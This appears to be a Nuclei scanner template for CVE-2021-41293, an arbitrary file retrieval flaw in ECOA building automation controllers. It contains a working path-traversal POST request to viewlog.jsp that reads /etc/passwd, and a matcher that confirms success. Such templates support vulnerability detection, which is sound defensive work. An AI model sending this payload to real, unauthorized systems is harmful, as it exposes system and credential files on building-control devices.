id: CVE-2021-41293 info: name: ECOA Building Automation System - Arbitrary File Retrieval author: 0x_Akoko severity: high description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 epss-score: 0.05376 epss-percentile: 0.92942 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware tags: cve2021,cve,ecoa,lfi,disclosure http: - raw: - | POST /viewlog.jsp HTTP/1.1 Host: {{Hostname}} yr=2021&mh=6&fname=../../../../../../../../etc/passwd matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402201cf6f41a3258c77f1c2a596c881f1d3f0724e938d4f7c03970e59b0c76aa7456022005d47055e3129d39fb98a626771da66a86a32cac9bd81dd969c7b575d3beeacf:922c64590222798bb761d5b6d8e72950